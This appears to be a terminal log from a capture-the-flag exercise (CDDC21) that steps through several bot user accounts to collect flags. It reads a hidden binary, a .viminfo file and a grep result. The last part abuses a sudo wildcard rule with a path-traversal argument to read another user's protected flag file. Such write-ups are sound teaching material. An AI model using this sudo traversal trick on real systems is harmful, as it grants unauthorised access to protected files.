bot2@cybot01:~$ exit                                                        exit                                                                        bot1@cybot01:/home/ubuntu$ CDDC21{b0t_eNtR3nC3}                             CDDC21{b0t_eNtR3nC3}: command not found
bot1@cybot01:/home/ubuntu$ su bot2                                          Password:                                                                   bot2@cybot01:/home/ubuntu$ ls -a                                            .   .bash_history  .bashrc  .profile  .sudo_as_admin_successful             ..  .bash_logout   .cache   .ssh                                            bot2@cybot01:/home/ubuntu$ cd ~                                             bot2@cybot01:~$ ls -a                                                        .  '.#flag$!!1'   ..   .bash_history   .bash_logout   .bashrc   .profile   bot2@cybot01:~$ file .#flag\$\!\!1                                          .#flag$!!1: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3c63148c5a69d6d9811154ddb1a4de902cc5795e, for GNU/Linux 3.2.0, not stripped
bot2@cybot01:~$ ./.#flag\$\!\!1                                             
CDDC21{TH4nKsF0R_p3RM}                                                      
bot2@cybot01:~$ su bot3
Password:                                                                   bot3@cybot01:/home/bot2$ cd ~
bot3@cybot01:~$ ls
                                                          
bot3@cybot01:~$ ls -a                                                       .  ..  .bash_history  .bash_logout  .bashrc  .profile  .viminfo             bot3@cybot01:~$

bot3@cybot01:~$ cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!

# Viminfo version
1,4

# Value of 'encoding' when this file was written
*encoding=utf-8

# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:w
2,0,1620820231,,"qa!"
:wq

# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Debug Line History (newest to oldest):
# Registers:

# File marks:
'0  1  15  /usr/local/share/secret
4,48,1,15,1620820231,"/usr/local/share/secret'

# Jumplist (newest first):
-'  1  15  /usr/local/share/secret
4,39,1,15,1620820231,"/usr/local/share/secret'

# History of marks within files (newest to oldest):

> /usr/local/share/secret
        *       1620820228      0
        "       1       15
        ^       1       16
        .       1       16
        +       1       16
bot3@cybot01:~$ cat /usr/local/share/secret
CDDC21{V1m_th3_s4vior}

$ su bot4

bot4@cybot01:~$ cat random-secrets | grep CDDC
CDDC21{gRe3EpL1nG}
bot4@cybot01:~$

bot5@cybot01:~$ ls -al
total 24
dr-xr-x---  2 root bot5 4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5 4096 Jun 18 09:51 ..
lrwxrwxrwx  1 root root    9 Jun 18 09:51 .bash_history -> /dev/null
-rwx------  1 root bot5    1 Jun 23 11:08 .bash_logout
-rwx------  1 root bot5  647 Jun 23 11:31 .bashrc
-rwxrwxrwx  1 root bot5   24 Jun 24 08:37 .profile
-r--------  1 bot6 root   22 Jun 18 09:51 flag.txt
bot5@cybot01:~$ sudo -l
Matching Defaults entries for bot5 on cybot01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bot5 may run the following commands on cybot01:
    (bot6 : bot6) NOPASSWD: /usr/bin/cat /var/log/*
bot5@cybot01:~$ sudo -u bot6 cat flag.txt
[sudo] password for bot5:
Sorry, user bot5 is not allowed to execute '/usr/bin/cat flag.txt' as bot6 on cybot01.
bot5@cybot01:~$ sudo -u bot6 cat
[sudo] password for bot5:
Sorry, user bot5 is not allowed to execute '/usr/bin/cat' as bot6 on cybot01.
bot5@cybot01:~$ sudo /usr/bin/cat /var/log/
alternatives.log       dmesg.0                private/
amazon/                dmesg.1.gz             syslog
apport.log             dmesg.2.gz             syslog.1
apt/                   dmesg.3.gz             syslog.2.gz
auth.log               dmesg.4.gz             syslog.3.gz
auth.log.1             dpkg.log               syslog.4.gz
btmp                   journal/               syslog.5.gz
cloud-init-output.log  kern.log               syslog.6.gz
cloud-init.log         kern.log.1             ubuntu-advantage.log
dist-upgrade/          landscape/             unattended-upgrades/
dmesg                  lastlog                wtmp
bot5@cybot01:~$ sudo /usr/bin/cat /var/log/auth.log
[sudo] password for bot5:
Sorry, user bot5 is not allowed to execute '/usr/bin/cat /var/log/auth.log' as root on cybot01.
bot5@cybot01:~$ sudo -u bot6 /usr/bin/cat /var/log/auth.log
/usr/bin/cat: /var/log/auth.log: Permission denied
bot5@cybot01:~$ sudo -u bot6 /usr/bin/cat /var/log/../../home/bot5/flag.txt
CDDC21{b3w4r3sud03rz}

